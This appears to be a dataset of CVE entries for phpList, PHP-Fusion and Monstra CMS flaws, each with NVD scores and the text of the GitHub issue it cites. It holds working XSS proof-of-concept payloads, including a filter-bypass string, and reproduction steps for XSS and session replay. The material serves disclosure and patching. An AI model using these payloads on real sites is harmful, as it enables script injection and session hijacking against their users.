https://github.com/phpList/phplist3/issues/665
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Send a Campaign" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel phplist 2. Go to 'phplist3/lists/admin/?page=send&delete=5&tk=20a8f65277024ee830090611cb93e35d' 3. Click 'Start or continue a campaign' -> 'no title 4. Insert Payload XSS: 'to email address(es)' // # "><svg/onload=prompt(1)> ![payload](https://user-images.githubusercontent.com/62001260/82779616-d7b12480-9e7e-11ea-8ebd-ab610adef0a3.PNG) 5. Next 6. xss alert message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screnhost** ![1](https://user-images.githubusercontent.com/62001260/82779455-72f5ca00-9e7e-11ea-89bd-1eaf1b0e30e4.png) ![2](https://user-images.githubusercontent.com/62001260/82779459-75f0ba80-9e7e-11ea-9c2a-ebb287d7173e.PNG) ![3](https://user-images.githubusercontent.com/62001260/82779467-78531480-9e7e-11ea-8653-934aab144a44.PNG) **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP
Cross Site Script Vulnerability on "Send a Campaign" feature in phplist version 3.5.3
https://api.github.com/repos/phpList/phplist3/issues/665/comments
4
2020-05-25T04:59:40Z
2020-05-26T21:16:59Z
https://github.com/phpList/phplist3/issues/665
624,045,419
665
2,125
CVE-2020-23209
2021-07-01T21:15:08.070
A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "List Description" field under the "Edit A List" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/666" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/666" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "75BC6689-BA8E-46E8-AF78-7AE719F3A17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/666
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Subscribers Lists" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel phplist 2. Go to 'phplist3/lists/admin/?page=list&tk=5346bb7f96da80c4ac675b4fe5b21f60' 3. Click 'Subscribers Lists' -> 'Add a lists' 4. Insert Payload XSS: 'to email address(es)' '><details/open/ontoggle=confirm(1337)> 5. Save -> Click 'Config' -> 'Add some subscribers' 6. xss alert message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screnhost** ![poc1](https://user-images.githubusercontent.com/62001260/82837234-a96d2c80-9ef2-11ea-9e76-915080fc3efa.png) ![payload1](https://user-images.githubusercontent.com/62001260/82837243-b12cd100-9ef2-11ea-9eaf-05330982bc1c.PNG) ![add1](https://user-images.githubusercontent.com/62001260/82837260-bb4ecf80-9ef2-11ea-88ca-485c5ffa7614.png) ![click2](https://user-images.githubusercontent.com/62001260/82837289-d4f01700-9ef2-11ea-8dfa-811d14db2a2e.png) ![mess_alert](https://user-images.githubusercontent.com/62001260/82837294-d7eb0780-9ef2-11ea-9a36-b708cfbc3464.PNG) **Also Video PoC** https://drive.google.com/open?id=1Oh0-YcP2Kombmgh2USyivptZNe-ywCa4 **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!
Cross Site Script Vulnerability on "Subscribers Lists" feature in phplist version 3.5.3
https://api.github.com/repos/phpList/phplist3/issues/666/comments
4
2020-05-25T18:43:58Z
2020-05-27T15:36:41Z
https://github.com/phpList/phplist3/issues/666
624,439,609
666
2,126
CVE-2020-23214
2021-07-01T21:15:08.100
A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Configure categories" field under the "Categorise Lists" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/669" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/669" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "75BC6689-BA8E-46E8-AF78-7AE719F3A17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/669
[ "Exploit", "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Categories Lists" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel phplist 2. Go to 'phplist3/lists/admin/?page=list&tk=dbf5ac23de96b3920307f34621dae3ee' 3. Click 'Subscribers Lists' -> 'Categories Lists' -> 'Configure Categories' 4. Insert Payload XSS: '><details/open/ontoggle=confirm(/r0ck3t1973/)> 5. Save and Back -> click chose 'CATEGORY' new -> Save -> click Subscribers 6. xss alert message **Screenhost** ![cat1](https://user-images.githubusercontent.com/62001260/83045214-7ef4ae00-a06f-11ea-8534-92915f3494fb.png) ![cat2](https://user-images.githubusercontent.com/62001260/83045235-874ce900-a06f-11ea-939c-3fa8b885e563.png) ![cat3](https://user-images.githubusercontent.com/62001260/83045256-8b790680-a06f-11ea-867a-5fd0e998263e.PNG) ![cat4](https://user-images.githubusercontent.com/62001260/83045275-8fa52400-a06f-11ea-86e1-cb60727bfa13.PNG) ![mess_alert1](https://user-images.githubusercontent.com/62001260/83045468-d004a200-a06f-11ea-9bf0-02f831c5a8e0.png) **Also Video PoC** https://drive.google.com/open?id=1ZY7QpWzg9SEkjXQsBCRUs-up8U0Yh1L2 **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!
Cross Site Script Vulnerability on "Categories Lists" feature in phplist version 3.5.3
https://api.github.com/repos/phpList/phplist3/issues/669/comments
3
2020-05-27T16:15:59Z
2020-05-29T14:58:27Z
https://github.com/phpList/phplist3/issues/669
625,836,434
669
2,127
CVE-2020-23217
2021-07-01T21:15:08.133
A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Add a list" field under the "Import Emails" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/672" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://www.phplist.org/newslist/phplist-3-5-4-release-notes/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/672" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://www.phplist.org/newslist/phplist-3-5-4-release-notes/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:3.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "75BC6689-BA8E-46E8-AF78-7AE719F3A17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/672
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
Hi Team phplist3, I found a small bug! **Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "IMPORT EMAILS" feature. It affects both options SEND A CAMPAIGN feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel phplist 2. Go to 'phplist3/lists/admin/?page=setup&tk=1c63b88932115188325586eab8221123' 3. Chose 'Config' -> Click 'Add some subscribers' -> Chose 1/3 options (Copy and paste list of emails) -> 'Add a list' 4. Insert Payload XSS: <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(/by r0ck3t1973))&rpar;">X</a> ![bypass0](https://user-images.githubusercontent.com/62001260/83326619-ba75bf00-a29f-11ea-98aa-2f78deab002a.PNG) 6. Save 7. xss alert message **Screenhost** ![bypass](https://user-images.githubusercontent.com/62001260/83326480-9d8cbc00-a29e-11ea-87cd-5f2a0d0a60e8.PNG) ![bypass1](https://user-images.githubusercontent.com/62001260/83326499-c1500200-a29e-11ea-8a7b-8aed2f1b6b5d.PNG) ![bypass2](https://user-images.githubusercontent.com/62001260/83326521-ee041980-a29e-11ea-8b4a-4e2f60c7c2bc.PNG) ![bypass3](https://user-images.githubusercontent.com/62001260/83326546-0f650580-a29f-11ea-9280-5dd2321a8514.PNG) **Also Video PoC** https://drive.google.com/file/d/1lm42PDQ2NZW4wajwq5eh4Hx9W69jAyLc/view?usp=sharing Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!
Bypass Cross Site Scripting Vulnerability on "IMPORT EMAILS" feature in php-list-3.5.4
https://api.github.com/repos/phpList/phplist3/issues/672/comments
8
2020-05-30T11:15:26Z
2020-06-01T21:04:22Z
https://github.com/phpList/phplist3/issues/672
627,708,280
672
2,128
CVE-2020-23219
2021-07-01T21:15:08.167
Monstra CMS 3.0.4 allows attackers to execute arbitrary code via a crafted payload entered into the "Snippet content" field under the "Edit Snippet" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/466" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/466" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A2226D9F-8476-4F0F-9DE3-21A8FE290533", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/monstra-cms/monstra/issues/466
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
**Describe the bug** An attacker could insert any executable code through php via Snippets Module to execution command in the server **To Reproduce** 1. Log into the panel. 2. Go to "admin/index.php?id=snippets" 3. Click edit 4. Insert payload ![payload](https://user-images.githubusercontent.com/62001260/82702103-90b70980-9c9b-11ea-9766-106f4e9673fb.PNG) 5. Save and Exit 6. Go to index view **Screenhost** ![edit](https://user-images.githubusercontent.com/62001260/82701979-50f02200-9c9b-11ea-8c96-fbbc4ecdd413.PNG) ![rce](https://user-images.githubusercontent.com/62001260/82701991-551c3f80-9c9b-11ea-8501-a5e5654a9ba0.PNG)
Remote Code Execution via Snippets module in Monstra version 3.0.4
https://api.github.com/repos/monstra-cms/monstra/issues/466/comments
1
2020-05-22T19:16:40Z
2021-07-10T12:28:42Z
https://github.com/monstra-cms/monstra/issues/466
623,431,301
466
2,129
CVE-2020-23178
2021-07-02T18:15:08.113
An issue exists in PHP-Fusion 9.03.50 where session cookies are not deleted once a user logs out, allowing for an attacker to perform a session replay attack and impersonate the victim user.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2314" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*", "matchCriteriaId": "0AB488D1-637D-4E18-A136-036994F7035F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "294" ]
294
https://github.com/PHPFusion/PHPFusion/issues/2314
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PHPFusion", "PHPFusion" ]
**Describe the bug** Hello every one, I have found a small vulnerbility your PHP Fusion. Here is the error details.(Broken Authentication and session management PHP Fusionon) Cookies are used to maintain session of the particular user and they should expire once the user logs out of his PHP Fusion account.In secure web application,Cookies immediately expire once the user logs out of his account. But this is not happening in the case of HP Fusion same cookies can be used again and again to open the session of the victim. In this Loop Hole The Application does not destroy session after logout.. means the cookies are working to login to user account & change account Information, The Cookies are usable i'm able to access the account & edit info. If anything is wrong please reponse to me. Thank you. **To Reproduce** Steps to reproduce the behavior: 1. Login to your account....... 2. Get the cookies using " Brub Suite" or "EditThisCookie" 3. Logout from the account... 4. Clear all the cookies related to PHP Fusion 5. Save the cookies you copied in a text file... 6. Now Injact/Import Old Cookies to the PHP Fusion by "EditThisCookie"... 7. As u can see.. you will be again logged In to PHP Fusion .. using old session cookies.. For More Information about This Vulnerability You can check OWASP Guide https://www.owasp.org/index.php?title=Broken_Authentication_and_Session_Management&setlang=en Here is a Video POC: https://drive.google.com/file/d/14IIIn0HcVyBk_kfcUJsZdpYgx72xdBZa/view
Broken Authentication and session management OWASP A2
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2314/comments
10
2020-05-11T06:08:24Z
2020-05-15T08:23:39Z
https://github.com/PHPFusion/PHPFusion/issues/2314
615,614,968
2,314
2,130
CVE-2020-23179
2021-07-02T18:15:08.157
A stored cross site scripting (XSS) vulnerability in administration/settings_main.php of PHP-Fusion 9.03.50 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Site footer" field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2320" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2320" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*", "matchCriteriaId": "0AB488D1-637D-4E18-A136-036994F7035F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PHPFusion/PHPFusion/issues/2320
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PHPFusion", "PHPFusion" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Main" feature **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "administration/settings_main.php" 3. Click edit on "Site footer" 4. Insert payload: ! [ ] (https://github.com/Songohan22/PHP_Furion/blob/master/4.PNG) <img src=xx onmouseover=alert('xss')> </img> 5. Click: "Save Setting" 6. Login as member 7. Go to Site footer 8. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Screenshots** 1. Go to "administration/settings_main.php" ! [ ] (https://github.com/Songohan22/PHP_Furion/blob/master/1.PNG) 2. Insert payload: <img src=xx onmouseover=alert('xss')> </img> on "Site footer" ! [ ] (https://github.com/Songohan22/PHP_Furion/blob/master/2.PNG) 3. XSS Alert Message ! [ ] (https://github.com/Songohan22/PHP_Furion/blob/master/3.PNG) **Desktop (please complete the following information):** - OS: Kali - Browser: Firefox - Version of Browser: 68.6
Cross Site Script Vulnerability on "Main settings"
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2320/comments
4
2020-05-14T18:56:28Z
2020-05-14T20:27:04Z
https://github.com/PHPFusion/PHPFusion/issues/2320
618,463,484
2,320
2,131
CVE-2020-23181
2021-07-02T18:15:08.203
A reflected cross site scripting (XSS) vulnerability in /administration/theme.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Manage Theme" field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2326" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2326" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.60:*:*:*:*:*:*:*", "matchCriteriaId": "A4375E88-4C03-4C87-9835-3AEC42937686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpfusion/PHPFusion/issues/2326
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "phpfusion", "PHPFusion" ]
**Describe the bug** An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the "Thêm Manager" feature. This was can be bypassed by using HTML event handlers, such as "ontoggle". **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/administration/theme.php" 3. Click "Manage Theme" 4. Insert payload `'><details/open/ontoggle=confirm(/XSS/)>` 5. Click "Save Changes" 6. View the preview to trigger XSS. 7. View the preview to get in request and such Reflected XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Screenshots** ![2](https://user-images.githubusercontent.com/29293812/82171532-d6698000-98f1-11ea-8a56-de19c0d60fe3.PNG) ![1](https://user-images.githubusercontent.com/29293812/82171540-d9fd0700-98f1-11ea-975b-b5db600ba024.PNG) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Theme Manager" feature in PHP-Fusion 9.03.60 (New Version)
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2326/comments
0
2020-05-18T03:28:54Z
2020-05-18T13:48:43Z
https://github.com/PHPFusion/PHPFusion/issues/2326
619,881,497
2,326
2,132
CVE-2020-23182
2021-07-02T18:15:08.243
The component /php-fusion/infusions/shoutbox_panel/shoutbox_archive.php in PHP-Fusion 9.03.60 allows attackers to redirect victim users to malicious websites via a crafted payload entered into the Shoutbox message panel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2329" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2329" } ]
